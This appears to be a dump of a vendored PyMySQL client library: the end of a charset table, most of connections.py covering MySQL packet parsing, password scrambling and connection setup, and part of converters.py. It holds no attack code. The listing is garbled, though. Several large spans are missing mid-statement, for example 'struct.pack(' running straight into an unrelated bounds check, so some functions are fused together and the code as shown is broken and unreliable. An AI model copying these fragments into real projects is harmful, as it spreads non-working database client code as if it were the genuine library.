_charsets.add(Charset(90, 'ucs2', 'ucs2_bin', '')) 141 | _charsets.add(Charset(91, 'ujis', 'ujis_bin', '')) 142 | _charsets.add(Charset(92, 'geostd8', 'geostd8_general_ci', 'Yes')) 143 | _charsets.add(Charset(93, 'geostd8', 'geostd8_bin', '')) 144 | _charsets.add(Charset(94, 'latin1', 'latin1_spanish_ci', '')) 145 | _charsets.add(Charset(95, 'cp932', 'cp932_japanese_ci', 'Yes')) 146 | _charsets.add(Charset(96, 'cp932', 'cp932_bin', '')) 147 | _charsets.add(Charset(97, 'eucjpms', 'eucjpms_japanese_ci', 'Yes')) 148 | _charsets.add(Charset(98, 'eucjpms', 'eucjpms_bin', '')) 149 | _charsets.add(Charset(99, 'cp1250', 'cp1250_polish_ci', '')) 150 | _charsets.add(Charset(101, 'utf16', 'utf16_unicode_ci', '')) 151 | _charsets.add(Charset(102, 'utf16', 'utf16_icelandic_ci', '')) 152 | _charsets.add(Charset(103, 'utf16', 'utf16_latvian_ci', '')) 153 | _charsets.add(Charset(104, 'utf16', 'utf16_romanian_ci', '')) 154 | _charsets.add(Charset(105, 'utf16', 'utf16_slovenian_ci', '')) 155 | _charsets.add(Charset(106, 'utf16', 'utf16_polish_ci', '')) 156 | _charsets.add(Charset(107, 'utf16', 'utf16_estonian_ci', '')) 157 | _charsets.add(Charset(108, 'utf16', 'utf16_spanish_ci', '')) 158 | _charsets.add(Charset(109, 'utf16', 'utf16_swedish_ci', '')) 159 | _charsets.add(Charset(110, 'utf16', 'utf16_turkish_ci', '')) 160 | _charsets.add(Charset(111, 'utf16', 'utf16_czech_ci', '')) 161 | _charsets.add(Charset(112, 'utf16', 'utf16_danish_ci', '')) 162 | _charsets.add(Charset(113, 'utf16', 'utf16_lithuanian_ci', '')) 163 | _charsets.add(Charset(114, 'utf16', 'utf16_slovak_ci', '')) 164 | _charsets.add(Charset(115, 'utf16', 'utf16_spanish2_ci', '')) 165 | _charsets.add(Charset(116, 'utf16', 'utf16_roman_ci', '')) 166 | _charsets.add(Charset(117, 'utf16', 'utf16_persian_ci', '')) 167 | _charsets.add(Charset(118, 'utf16', 'utf16_esperanto_ci', '')) 168 | _charsets.add(Charset(119, 'utf16', 'utf16_hungarian_ci', '')) 169 | _charsets.add(Charset(120, 'utf16', 'utf16_sinhala_ci', '')) 170 | _charsets.add(Charset(128, 'ucs2', 'ucs2_unicode_ci', '')) 171 | _charsets.add(Charset(129, 'ucs2', 'ucs2_icelandic_ci', '')) 172 | _charsets.add(Charset(130, 'ucs2', 'ucs2_latvian_ci', '')) 173 | _charsets.add(Charset(131, 'ucs2', 'ucs2_romanian_ci', '')) 174 | _charsets.add(Charset(132, 'ucs2', 'ucs2_slovenian_ci', '')) 175 | _charsets.add(Charset(133, 'ucs2', 'ucs2_polish_ci', '')) 176 | _charsets.add(Charset(134, 'ucs2', 'ucs2_estonian_ci', '')) 177 | _charsets.add(Charset(135, 'ucs2', 'ucs2_spanish_ci', '')) 178 | _charsets.add(Charset(136, 'ucs2', 'ucs2_swedish_ci', '')) 179 | _charsets.add(Charset(137, 'ucs2', 'ucs2_turkish_ci', '')) 180 | _charsets.add(Charset(138, 'ucs2', 'ucs2_czech_ci', '')) 181 | _charsets.add(Charset(139, 'ucs2', 'ucs2_danish_ci', '')) 182 | _charsets.add(Charset(140, 'ucs2', 'ucs2_lithuanian_ci', '')) 183 | _charsets.add(Charset(141, 'ucs2', 'ucs2_slovak_ci', '')) 184 | _charsets.add(Charset(142, 'ucs2', 'ucs2_spanish2_ci', '')) 185 | _charsets.add(Charset(143, 'ucs2', 'ucs2_roman_ci', '')) 186 | _charsets.add(Charset(144, 'ucs2', 'ucs2_persian_ci', '')) 187 | _charsets.add(Charset(145, 'ucs2', 'ucs2_esperanto_ci', '')) 188 | _charsets.add(Charset(146, 'ucs2', 'ucs2_hungarian_ci', '')) 189 | _charsets.add(Charset(147, 'ucs2', 'ucs2_sinhala_ci', '')) 190 | _charsets.add(Charset(159, 'ucs2', 'ucs2_general_mysql500_ci', '')) 191 | _charsets.add(Charset(160, 'utf32', 'utf32_unicode_ci', '')) 192 | _charsets.add(Charset(161, 'utf32', 'utf32_icelandic_ci', '')) 193 | _charsets.add(Charset(162, 'utf32', 
'utf32_latvian_ci', '')) 194 | _charsets.add(Charset(163, 'utf32', 'utf32_romanian_ci', '')) 195 | _charsets.add(Charset(164, 'utf32', 'utf32_slovenian_ci', '')) 196 | _charsets.add(Charset(165, 'utf32', 'utf32_polish_ci', '')) 197 | _charsets.add(Charset(166, 'utf32', 'utf32_estonian_ci', '')) 198 | _charsets.add(Charset(167, 'utf32', 'utf32_spanish_ci', '')) 199 | _charsets.add(Charset(168, 'utf32', 'utf32_swedish_ci', '')) 200 | _charsets.add(Charset(169, 'utf32', 'utf32_turkish_ci', '')) 201 | _charsets.add(Charset(170, 'utf32', 'utf32_czech_ci', '')) 202 | _charsets.add(Charset(171, 'utf32', 'utf32_danish_ci', '')) 203 | _charsets.add(Charset(172, 'utf32', 'utf32_lithuanian_ci', '')) 204 | _charsets.add(Charset(173, 'utf32', 'utf32_slovak_ci', '')) 205 | _charsets.add(Charset(174, 'utf32', 'utf32_spanish2_ci', '')) 206 | _charsets.add(Charset(175, 'utf32', 'utf32_roman_ci', '')) 207 | _charsets.add(Charset(176, 'utf32', 'utf32_persian_ci', '')) 208 | _charsets.add(Charset(177, 'utf32', 'utf32_esperanto_ci', '')) 209 | _charsets.add(Charset(178, 'utf32', 'utf32_hungarian_ci', '')) 210 | _charsets.add(Charset(179, 'utf32', 'utf32_sinhala_ci', '')) 211 | _charsets.add(Charset(192, 'utf8', 'utf8_unicode_ci', '')) 212 | _charsets.add(Charset(193, 'utf8', 'utf8_icelandic_ci', '')) 213 | _charsets.add(Charset(194, 'utf8', 'utf8_latvian_ci', '')) 214 | _charsets.add(Charset(195, 'utf8', 'utf8_romanian_ci', '')) 215 | _charsets.add(Charset(196, 'utf8', 'utf8_slovenian_ci', '')) 216 | _charsets.add(Charset(197, 'utf8', 'utf8_polish_ci', '')) 217 | _charsets.add(Charset(198, 'utf8', 'utf8_estonian_ci', '')) 218 | _charsets.add(Charset(199, 'utf8', 'utf8_spanish_ci', '')) 219 | _charsets.add(Charset(200, 'utf8', 'utf8_swedish_ci', '')) 220 | _charsets.add(Charset(201, 'utf8', 'utf8_turkish_ci', '')) 221 | _charsets.add(Charset(202, 'utf8', 'utf8_czech_ci', '')) 222 | _charsets.add(Charset(203, 'utf8', 'utf8_danish_ci', '')) 223 | _charsets.add(Charset(204, 'utf8', 'utf8_lithuanian_ci', '')) 224 | _charsets.add(Charset(205, 'utf8', 'utf8_slovak_ci', '')) 225 | _charsets.add(Charset(206, 'utf8', 'utf8_spanish2_ci', '')) 226 | _charsets.add(Charset(207, 'utf8', 'utf8_roman_ci', '')) 227 | _charsets.add(Charset(208, 'utf8', 'utf8_persian_ci', '')) 228 | _charsets.add(Charset(209, 'utf8', 'utf8_esperanto_ci', '')) 229 | _charsets.add(Charset(210, 'utf8', 'utf8_hungarian_ci', '')) 230 | _charsets.add(Charset(211, 'utf8', 'utf8_sinhala_ci', '')) 231 | _charsets.add(Charset(223, 'utf8', 'utf8_general_mysql500_ci', '')) 232 | _charsets.add(Charset(224, 'utf8mb4', 'utf8mb4_unicode_ci', '')) 233 | _charsets.add(Charset(225, 'utf8mb4', 'utf8mb4_icelandic_ci', '')) 234 | _charsets.add(Charset(226, 'utf8mb4', 'utf8mb4_latvian_ci', '')) 235 | _charsets.add(Charset(227, 'utf8mb4', 'utf8mb4_romanian_ci', '')) 236 | _charsets.add(Charset(228, 'utf8mb4', 'utf8mb4_slovenian_ci', '')) 237 | _charsets.add(Charset(229, 'utf8mb4', 'utf8mb4_polish_ci', '')) 238 | _charsets.add(Charset(230, 'utf8mb4', 'utf8mb4_estonian_ci', '')) 239 | _charsets.add(Charset(231, 'utf8mb4', 'utf8mb4_spanish_ci', '')) 240 | _charsets.add(Charset(232, 'utf8mb4', 'utf8mb4_swedish_ci', '')) 241 | _charsets.add(Charset(233, 'utf8mb4', 'utf8mb4_turkish_ci', '')) 242 | _charsets.add(Charset(234, 'utf8mb4', 'utf8mb4_czech_ci', '')) 243 | _charsets.add(Charset(235, 'utf8mb4', 'utf8mb4_danish_ci', '')) 244 | _charsets.add(Charset(236, 'utf8mb4', 'utf8mb4_lithuanian_ci', '')) 245 | _charsets.add(Charset(237, 'utf8mb4', 'utf8mb4_slovak_ci', '')) 246 | 
_charsets.add(Charset(238, 'utf8mb4', 'utf8mb4_spanish2_ci', '')) 247 | _charsets.add(Charset(239, 'utf8mb4', 'utf8mb4_roman_ci', '')) 248 | _charsets.add(Charset(240, 'utf8mb4', 'utf8mb4_persian_ci', '')) 249 | _charsets.add(Charset(241, 'utf8mb4', 'utf8mb4_esperanto_ci', '')) 250 | _charsets.add(Charset(242, 'utf8mb4', 'utf8mb4_hungarian_ci', '')) 251 | _charsets.add(Charset(243, 'utf8mb4', 'utf8mb4_sinhala_ci', '')) 252 | 253 | 254 | charset_by_name = _charsets.by_name 255 | charset_by_id = _charsets.by_id 256 | 257 | 258 | def charset_to_encoding(name): 259 | """Convert MySQL's charset name to Python's codec name""" 260 | if name == 'utf8mb4': 261 | return 'utf8' 262 | return name 263 | -------------------------------------------------------------------------------- /databases/pymysql/connections.py: -------------------------------------------------------------------------------- 1 | # Python implementation of the MySQL client-server protocol 2 | # http://dev.mysql.com/doc/internals/en/client-server-protocol.html 3 | 4 | from __future__ import print_function 5 | from _compat import PY2, range_type, text_type, str_type, JYTHON, IRONPYTHON 6 | 7 | import errno 8 | from functools import partial 9 | import os 10 | import hashlib 11 | import socket 12 | 13 | try: 14 | import ssl 15 | SSL_ENABLED = True 16 | except ImportError: 17 | SSL_ENABLED = False 18 | 19 | import struct 20 | import sys 21 | if PY2: 22 | import ConfigParser as configparser 23 | else: 24 | import configparser 25 | 26 | import io 27 | 28 | try: 29 | import getpass 30 | DEFAULT_USER = getpass.getuser() 31 | except ImportError: 32 | DEFAULT_USER = None 33 | 34 | 35 | from charset import MBLENGTH, charset_by_name, charset_by_id 36 | from cursors import Cursor 37 | from constants import FIELD_TYPE 38 | from constants import SERVER_STATUS 39 | from constants.CLIENT import * 40 | from constants.COMMAND import * 41 | from util import byte2int, int2byte 42 | from converters import escape_item, encoders, decoders, escape_string 43 | from err import ( 44 | raise_mysql_exception, Warning, Error, 45 | InterfaceError, DataError, DatabaseError, OperationalError, 46 | IntegrityError, InternalError, NotSupportedError, ProgrammingError) 47 | 48 | _py_version = sys.version_info[:2] 49 | 50 | 51 | # socket.makefile() in Python 2 is not usable because very inefficient and 52 | # bad behavior about timeout. 53 | # XXX: ._socketio doesn't work under IronPython. 54 | if _py_version == (2, 7) and not IRONPYTHON: 55 | # read method of file-like returned by sock.makefile() is very slow. 56 | # So we copy io-based one from Python 3. 57 | from _socketio import SocketIO 58 | def _makefile(sock, mode): 59 | return io.BufferedReader(SocketIO(sock, mode)) 60 | elif _py_version == (2, 6): 61 | # Python 2.6 doesn't have fast io module. 62 | # So we make original one. 63 | class SockFile(object): 64 | def __init__(self, sock): 65 | self._sock = sock 66 | def read(self, n): 67 | read = self._sock.recv(n) 68 | if len(read) == n: 69 | return read 70 | while True: 71 | data = self._sock.recv(n-len(read)) 72 | if not data: 73 | return read 74 | read += data 75 | if len(read) == n: 76 | return read 77 | 78 | def _makefile(sock, mode): 79 | assert mode == 'rb' 80 | return SockFile(sock) 81 | else: 82 | # socket.makefile in Python 3 is nice. 
83 | def _makefile(sock, mode): 84 | return sock.makefile(mode) 85 | 86 | 87 | TEXT_TYPES = set([ 88 | FIELD_TYPE.BIT, 89 | FIELD_TYPE.BLOB, 90 | FIELD_TYPE.LONG_BLOB, 91 | FIELD_TYPE.MEDIUM_BLOB, 92 | FIELD_TYPE.STRING, 93 | FIELD_TYPE.TINY_BLOB, 94 | FIELD_TYPE.VAR_STRING, 95 | FIELD_TYPE.VARCHAR]) 96 | 97 | sha_new = partial(hashlib.new, 'sha1') 98 | 99 | DEBUG = False 100 | 101 | NULL_COLUMN = 251 102 | UNSIGNED_CHAR_COLUMN = 251 103 | UNSIGNED_SHORT_COLUMN = 252 104 | UNSIGNED_INT24_COLUMN = 253 105 | UNSIGNED_INT64_COLUMN = 254 106 | UNSIGNED_CHAR_LENGTH = 1 107 | UNSIGNED_SHORT_LENGTH = 2 108 | UNSIGNED_INT24_LENGTH = 3 109 | UNSIGNED_INT64_LENGTH = 8 110 | 111 | DEFAULT_CHARSET = 'latin1' 112 | 113 | MAX_PACKET_LEN = 2**24-1 114 | 115 | 116 | def dump_packet(data): 117 | 118 | def is_ascii(data): 119 | if 65 <= byte2int(data) <= 122: #data.isalnum(): 120 | if isinstance(data, int): 121 | return chr(data) 122 | return data 123 | return '.' 124 | 125 | try: 126 | print("packet length:", len(data)) 127 | print("method call[1]:", sys._getframe(1).f_code.co_name) 128 | print("method call[2]:", sys._getframe(2).f_code.co_name) 129 | print("method call[3]:", sys._getframe(3).f_code.co_name) 130 | print("method call[4]:", sys._getframe(4).f_code.co_name) 131 | print("method call[5]:", sys._getframe(5).f_code.co_name) 132 | print("-" * 88) 133 | except ValueError: 134 | pass 135 | dump_data = [data[i:i+16] for i in range_type(0, min(len(data), 256), 16)] 136 | for d in dump_data: 137 | print(' '.join(map(lambda x:"{:02X}".format(byte2int(x)), d)) + 138 | ' ' * (16 - len(d)) + ' ' * 2 + 139 | ' '.join(map(lambda x:"{}".format(is_ascii(x)), d))) 140 | print("-" * 88) 141 | print() 142 | 143 | 144 | def _scramble(password, message): 145 | if not password: 146 | return b'\0' 147 | if DEBUG: print('password=' + password) 148 | stage1 = sha_new(password).digest() 149 | stage2 = sha_new(stage1).digest() 150 | s = sha_new() 151 | s.update(message) 152 | s.update(stage2) 153 | result = s.digest() 154 | return _my_crypt(result, stage1) 155 | 156 | 157 | def _my_crypt(message1, message2): 158 | length = len(message1) 159 | result = struct.pack('B', length) 160 | for i in range_type(length): 161 | x = (struct.unpack('B', message1[i:i+1])[0] ^ 162 | struct.unpack('B', message2[i:i+1])[0]) 163 | result += struct.pack('B', x) 164 | return result 165 | 166 | # old_passwords support ported from libmysql/password.c 167 | SCRAMBLE_LENGTH_323 = 8 168 | 169 | 170 | class RandStruct_323(object): 171 | def __init__(self, seed1, seed2): 172 | self.max_value = 0x3FFFFFFF 173 | self.seed1 = seed1 % self.max_value 174 | self.seed2 = seed2 % self.max_value 175 | 176 | def my_rnd(self): 177 | self.seed1 = (self.seed1 * 3 + self.seed2) % self.max_value 178 | self.seed2 = (self.seed1 + self.seed2 + 33) % self.max_value 179 | return float(self.seed1) / float(self.max_value) 180 | 181 | 182 | def _scramble_323(password, message): 183 | hash_pass = _hash_password_323(password) 184 | hash_message = _hash_password_323(message[:SCRAMBLE_LENGTH_323]) 185 | hash_pass_n = struct.unpack(">LL", hash_pass) 186 | hash_message_n = struct.unpack(">LL", hash_message) 187 | 188 | rand_st = RandStruct_323(hash_pass_n[0] ^ hash_message_n[0], 189 | hash_pass_n[1] ^ hash_message_n[1]) 190 | outbuf = io.BytesIO() 191 | for _ in range_type(min(SCRAMBLE_LENGTH_323, len(message))): 192 | outbuf.write(int2byte(int(rand_st.my_rnd() * 31) + 64)) 193 | extra = int2byte(int(rand_st.my_rnd() * 31)) 194 | out = outbuf.getvalue() 195 | outbuf = 
io.BytesIO() 196 | for c in out: 197 | outbuf.write(int2byte(byte2int(c) ^ byte2int(extra))) 198 | return outbuf.getvalue() 199 | 200 | 201 | def _hash_password_323(password): 202 | nr = 1345345333 203 | add = 7 204 | nr2 = 0x12345671 205 | 206 | for c in [byte2int(x) for x in password if x not in (' ', '\t')]: 207 | nr^= (((nr & 63)+add)*c)+ (nr << 8) & 0xFFFFFFFF 208 | nr2= (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF 209 | add= (add + c) & 0xFFFFFFFF 210 | 211 | r1 = nr & ((1 << 31) - 1) # kill sign bits 212 | r2 = nr2 & ((1 << 31) - 1) 213 | 214 | # pack 215 | return struct.pack(">LL", r1, r2) 216 | 217 | 218 | def pack_int24(n): 219 | return struct.pack(' len(self._data): 275 | raise Exception('Invalid advance amount (%s) for cursor. ' 276 | 'Position=%s' % (length, new_position)) 277 | self._position = new_position 278 | 279 | def rewind(self, position=0): 280 | """Set the position of the data buffer cursor to 'position'.""" 281 | if position < 0 or position > len(self._data): 282 | raise Exception("Invalid position to rewind cursor to: %s." % position) 283 | self._position = position 284 | 285 | def get_bytes(self, position, length=1): 286 | """Get 'length' bytes starting at 'position'. 287 | 288 | Position is start of payload (first four packet header bytes are not 289 | included) starting at index '0'. 290 | 291 | No error checking is done. If requesting outside end of buffer 292 | an empty string (or string shorter than 'length') may be returned! 293 | """ 294 | return self._data[position:(position+length)] 295 | 296 | def read_length_encoded_integer(self): 297 | """Read a 'Length Coded Binary' number from the data buffer. 298 | 299 | Length coded numbers can be anywhere from 1 to 9 bytes depending 300 | on the value of the first byte. 301 | """ 302 | c = ord(self.read(1)) 303 | if c == NULL_COLUMN: 304 | return None 305 | if c < UNSIGNED_CHAR_COLUMN: 306 | return c 307 | elif c == UNSIGNED_SHORT_COLUMN: 308 | return unpack_uint16(self.read(UNSIGNED_SHORT_LENGTH)) 309 | elif c == UNSIGNED_INT24_COLUMN: 310 | return unpack_int24(self.read(UNSIGNED_INT24_LENGTH)) 311 | elif c == UNSIGNED_INT64_COLUMN: 312 | return unpack_int64(self.read(UNSIGNED_INT64_LENGTH)) 313 | 314 | def read_length_coded_string(self): 315 | """Read a 'Length Coded String' from the data buffer. 316 | 317 | A 'Length Coded String' consists first of a length coded 318 | (unsigned, positive) integer represented in 1-9 bytes followed by 319 | that many bytes of binary data. (For example "cat" would be "3cat".) 320 | """ 321 | length = self.read_length_encoded_integer() 322 | if length is None: 323 | return None 324 | return self.read(length) 325 | 326 | def is_ok_packet(self): 327 | return self._data[0:1] == b'\0' 328 | 329 | def is_eof_packet(self): 330 | # http://dev.mysql.com/doc/internals/en/generic-response-packets.html#packet-EOF_Packet 331 | # Caution: \xFE may be LengthEncodedInteger. 332 | # If \xFE is LengthEncodedInteger header, 8bytes followed. 
333 | return len(self._data) < 9 and self._data[0:1] == b'\xfe' 334 | 335 | def is_resultset_packet(self): 336 | field_count = ord(self._data[0:1]) 337 | return 1 <= field_count <= 250 338 | 339 | def is_error_packet(self): 340 | return self._data[0:1] == b'\xff' 341 | 342 | def check_error(self): 343 | if self.is_error_packet(): 344 | self.rewind() 345 | self.advance(1) # field_count == error (we already know that) 346 | errno = unpack_uint16(self.read(2)) 347 | if DEBUG: print("errno =", errno) 348 | raise_mysql_exception(self._data) 349 | 350 | def dump(self): 351 | dump_packet(self._data) 352 | 353 | 354 | class FieldDescriptorPacket(MysqlPacket): 355 | """A MysqlPacket that represents a specific column's metadata in the result. 356 | 357 | Parsing is automatically done and the results are exported via public 358 | attributes on the class such as: db, table_name, name, length, type_code. 359 | """ 360 | 361 | def __init__(self, data, encoding): 362 | MysqlPacket.__init__(self, data, encoding) 363 | self.__parse_field_descriptor(encoding) 364 | 365 | def __parse_field_descriptor(self, encoding): 366 | """Parse the 'Field Descriptor' (Metadata) packet. 367 | 368 | This is compatible with MySQL 4.1+ (not compatible with MySQL 4.0). 369 | """ 370 | self.catalog = self.read_length_coded_string() 371 | self.db = self.read_length_coded_string() 372 | self.table_name = self.read_length_coded_string().decode(encoding) 373 | self.org_table = self.read_length_coded_string().decode(encoding) 374 | self.name = self.read_length_coded_string().decode(encoding) 375 | self.org_name = self.read_length_coded_string().decode(encoding) 376 | self.advance(1) # non-null filler 377 | self.charsetnr = struct.unpack(' 2: 509 | use_unicode = True 510 | 511 | if db is not None and database is None: 512 | database = db 513 | if passwd is not None and not password: 514 | password = passwd 515 | 516 | if compress or named_pipe: 517 | raise NotImplementedError("compress and named_pipe arguments are not supported") 518 | 519 | if ssl and ('capath' in ssl or 'cipher' in ssl): 520 | raise NotImplementedError('ssl options capath and cipher are not supported') 521 | 522 | self.ssl = False 523 | if ssl: 524 | if not SSL_ENABLED: 525 | raise NotImplementedError("ssl module not found") 526 | self.ssl = True 527 | client_flag |= SSL 528 | for k in ('key', 'cert', 'ca'): 529 | v = None 530 | if k in ssl: 531 | v = ssl[k] 532 | setattr(self, k, v) 533 | 534 | if read_default_group and not read_default_file: 535 | if sys.platform.startswith("win"): 536 | read_default_file = "c:\\my.ini" 537 | else: 538 | read_default_file = "/etc/my.cnf" 539 | 540 | if read_default_file: 541 | if not read_default_group: 542 | read_default_group = "client" 543 | 544 | cfg = configparser.RawConfigParser() 545 | cfg.read(os.path.expanduser(read_default_file)) 546 | 547 | def _config(key, default): 548 | try: 549 | return cfg.get(read_default_group, key) 550 | except Exception: 551 | return default 552 | 553 | user = _config("user", user) 554 | password = _config("password", password) 555 | host = _config("host", host) 556 | database = _config("database", database) 557 | unix_socket = _config("socket", unix_socket) 558 | port = int(_config("port", port)) 559 | charset = _config("default-character-set", charset) 560 | 561 | self.host = host 562 | self.port = port 563 | self.user = user or DEFAULT_USER 564 | self.password = password or "" 565 | self.db = database 566 | self.no_delay = no_delay 567 | self.unix_socket = unix_socket 568 | if charset: 569 
| self.charset = charset 570 | self.use_unicode = True 571 | else: 572 | self.charset = DEFAULT_CHARSET 573 | self.use_unicode = False 574 | 575 | if use_unicode is not None: 576 | self.use_unicode = use_unicode 577 | 578 | self.encoding = charset_by_name(self.charset).encoding 579 | 580 | client_flag |= CAPABILITIES 581 | client_flag |= MULTI_STATEMENTS 582 | if self.db: 583 | client_flag |= CONNECT_WITH_DB 584 | self.client_flag = client_flag 585 | 586 | self.cursorclass = cursorclass 587 | self.connect_timeout = connect_timeout 588 | 589 | self._result = None 590 | self._affected_rows = 0 591 | self.host_info = "Not connected" 592 | 593 | #: specified autocommit mode. None means use server default. 594 | self.autocommit_mode = autocommit 595 | 596 | self.encoders = encoders # Need for MySQLdb compatibility. 597 | self.decoders = conv 598 | self.sql_mode = sql_mode 599 | self.init_command = init_command 600 | self._connect() 601 | 602 | def close(self): 603 | ''' Send the quit message and close the socket ''' 604 | if self.socket is None: 605 | raise Error("Already closed") 606 | send_data = struct.pack('= i + 6: 1005 | lang, stat, cap_h, salt_len = struct.unpack('= i + salt_len: 1021 | self.salt += data[i:i+salt_len] # salt_len includes auth_plugin_data_part_1 and filler 1022 | #TODO: AUTH PLUGIN NAME may appear here. 1023 | 1024 | def get_server_info(self): 1025 | return self.server_version 1026 | 1027 | Warning = Warning 1028 | Error = Error 1029 | InterfaceError = InterfaceError 1030 | DatabaseError = DatabaseError 1031 | DataError = DataError 1032 | OperationalError = OperationalError 1033 | IntegrityError = IntegrityError 1034 | InternalError = InternalError 1035 | ProgrammingError = ProgrammingError 1036 | NotSupportedError = NotSupportedError 1037 | 1038 | class Result(): 1039 | 1040 | def __init__(self,data): 1041 | self.data = data 1042 | self.index = 0 1043 | self.charset = DEFAULT_CHARSET 1044 | self.encoding = charset_by_name(self.charset).encoding 1045 | self.use_unicode = None 1046 | self.decoders = decoders 1047 | 1048 | def _read_packet(self, packet_type=MysqlPacket): 1049 | """Read an entire "mysql packet" in its entirety from the network 1050 | and return a MysqlPacket type that represents the results. 1051 | """ 1052 | buff = b'' 1053 | while True: 1054 | packet_header = self._read_bytes(4) 1055 | if DEBUG: dump_packet(packet_header) 1056 | packet_length_bin = packet_header[:3] 1057 | 1058 | #TODO: check sequence id 1059 | # packet_number 1060 | byte2int(packet_header[3]) 1061 | 1062 | bin_length = packet_length_bin + b'\0' # pad little-endian number 1063 | bytes_to_read = struct.unpack('>> datetime_or_None('2007-02-25 23:06:20') 102 | datetime.datetime(2007, 2, 25, 23, 6, 20) 103 | >>> datetime_or_None('2007-02-25T23:06:20') 104 | datetime.datetime(2007, 2, 25, 23, 6, 20) 105 | 106 | Illegal values are returned as None: 107 | 108 | >>> datetime_or_None('2007-02-31T23:06:20') is None 109 | True 110 | >>> datetime_or_None('0000-00-00 00:00:00') is None 111 | True 112 | 113 | """ 114 | if ' ' in obj: 115 | sep = ' ' 116 | elif 'T' in obj: 117 | sep = 'T' 118 | else: 119 | return convert_date(obj) 120 | 121 | try: 122 | ymd, hms = obj.split(sep, 1) 123 | usecs = '0' 124 | if '.' in hms: 125 | hms, usecs = hms.split('.') 126 | usecs = float('0.' 
+ usecs) * 1e6 127 | return datetime.datetime(*[ int(x) for x in ymd.split('-')+hms.split(':')+[usecs] ]) 128 | except ValueError: 129 | return convert_date(obj) 130 | 131 | 132 | def convert_timedelta(obj): 133 | """Returns a TIME column as a timedelta object: 134 | 135 | >>> timedelta_or_None('25:06:17') 136 | datetime.timedelta(1, 3977) 137 | >>> timedelta_or_None('-25:06:17') 138 | datetime.timedelta(-2, 83177) 139 | 140 | Illegal values are returned as None: 141 | 142 | >>> timedelta_or_None('random crap') is None 143 | True 144 | 145 | Note that MySQL always returns TIME columns as (+|-)HH:MM:SS, but 146 | can accept values as (+|-)DD HH:MM:SS. The latter format will not 147 | be parsed correctly by this function. 148 | """ 149 | try: 150 | microseconds = 0 151 | if "." in obj: 152 | (obj, tail) = obj.split('.') 153 | microseconds = float('0.' + tail) * 1e6 154 | hours, minutes, seconds = obj.split(':') 155 | negate = 1 156 | if hours.startswith("-"): 157 | hours = hours[1:] 158 | negate = -1 159 | tdelta = datetime.timedelta( 160 | hours = int(hours), 161 | minutes = int(minutes), 162 | seconds = int(seconds), 163 | microseconds = int(microseconds) 164 | ) * negate 165 | return tdelta 166 | except ValueError: 167 | return None 168 | 169 | def convert_time(obj): 170 | """Returns a TIME column as a time object: 171 | 172 | >>> time_or_None('15:06:17') 173 | datetime.time(15, 6, 17) 174 | 175 | Illegal values are returned as None: 176 | 177 | >>> time_or_None('-25:06:17') is None 178 | True 179 | >>> time_or_None('random crap') is None 180 | True 181 | 182 | Note that MySQL always returns TIME columns as (+|-)HH:MM:SS, but 183 | can accept values as (+|-)DD HH:MM:SS. The latter format will not 184 | be parsed correctly by this function. 185 | 186 | Also note that MySQL's TIME column corresponds more closely to 187 | Python's timedelta and not time. However if you want TIME columns 188 | to be treated as time-of-day and not a time offset, then you can 189 | use set this function as the converter for FIELD_TYPE.TIME. 190 | """ 191 | try: 192 | microseconds = 0 193 | if "." in obj: 194 | (obj, tail) = obj.split('.') 195 | microseconds = float('0.' + tail) * 1e6 196 | hours, minutes, seconds = obj.split(':') 197 | return datetime.time(hour=int(hours), minute=int(minutes), 198 | second=int(seconds), microsecond=int(microseconds)) 199 | except ValueError: 200 | return None 201 | 202 | def convert_date(obj): 203 | """Returns a DATE column as a date object: 204 | 205 | >>> date_or_None('2007-02-26') 206 | datetime.date(2007, 2, 26) 207 | 208 | Illegal values are returned as None: 209 | 210 | >>> date_or_None('2007-02-31') is None 211 | True 212 | >>> date_or_None('0000-00-00') is None 213 | True 214 | 215 | """ 216 | try: 217 | return datetime.date(*[ int(x) for x in obj.split('-', 2) ]) 218 | except ValueError: 219 | return None 220 | 221 | 222 | def convert_mysql_timestamp(timestamp): 223 | """Convert a MySQL TIMESTAMP to a Timestamp object. 
224 | 225 | MySQL >= 4.1 returns TIMESTAMP in the same format as DATETIME: 226 | 227 | >>> mysql_timestamp_converter('2007-02-25 22:32:17') 228 | datetime.datetime(2007, 2, 25, 22, 32, 17) 229 | 230 | MySQL < 4.1 uses a big string of numbers: 231 | 232 | >>> mysql_timestamp_converter('20070225223217') 233 | datetime.datetime(2007, 2, 25, 22, 32, 17) 234 | 235 | Illegal values are returned as None: 236 | 237 | >>> mysql_timestamp_converter('2007-02-31 22:32:17') is None 238 | True 239 | >>> mysql_timestamp_converter('00000000000000') is None 240 | True 241 | 242 | """ 243 | if timestamp[4] == '-': 244 | return convert_datetime(timestamp) 245 | timestamp += "0"*(14-len(timestamp)) # padding 246 | year, month, day, hour, minute, second = \ 247 | int(timestamp[:4]), int(timestamp[4:6]), int(timestamp[6:8]), \ 248 | int(timestamp[8:10]), int(timestamp[10:12]), int(timestamp[12:14]) 249 | try: 250 | return datetime.datetime(year, month, day, hour, minute, second) 251 | except ValueError: 252 | return None 253 | 254 | def convert_set(s): 255 | return set(s.split(",")) 256 | 257 | def convert_bit(b): 258 | #b = "\x00" * (8 - len(b)) + b # pad w/ zeroes 259 | #return struct.unpack(">Q", b)[0] 260 | # 261 | # the snippet above is right, but MySQLdb doesn't process bits, 262 | # so we shouldn't either 263 | return b 264 | 265 | def convert_characters(connection, field, data): 266 | field_charset = charset_by_id(field.charsetnr).name 267 | encoding = charset_to_encoding(field_charset) 268 | if field.flags & FLAG.SET: 269 | return convert_set(data.decode(encoding)) 270 | if field.flags & FLAG.BINARY: 271 | return data 272 | 273 | if connection.use_unicode: 274 | data = data.decode(encoding) 275 | elif connection.charset != field_charset: 276 | data = data.decode(encoding) 277 | data = data.encode(connection.encoding) 278 | return data 279 | 280 | encoders = { 281 | bool: escape_bool, 282 | int: escape_int, 283 | long_type: escape_int, 284 | float: escape_float, 285 | str: escape_str, 286 | text_type: escape_unicode, 287 | tuple: escape_sequence, 288 | list: escape_sequence, 289 | set: escape_sequence, 290 | dict: escape_dict, 291 | type(None): escape_None, 292 | datetime.date: escape_date, 293 | datetime.datetime: escape_datetime, 294 | datetime.timedelta: escape_timedelta, 295 | datetime.time: escape_time, 296 | time.struct_time: escape_struct_time, 297 | Decimal: str, 298 | } 299 | 300 | 301 | def through(x): 302 | return x 303 | 304 | if not PY2 or JYTHON or IRONPYTHON: 305 | encoders[bytes] = escape_bytes 306 | 307 | decoders = { 308 | FIELD_TYPE.BIT: convert_bit, 309 | FIELD_TYPE.TINY: int, 310 | FIELD_TYPE.SHORT: int, 311 | 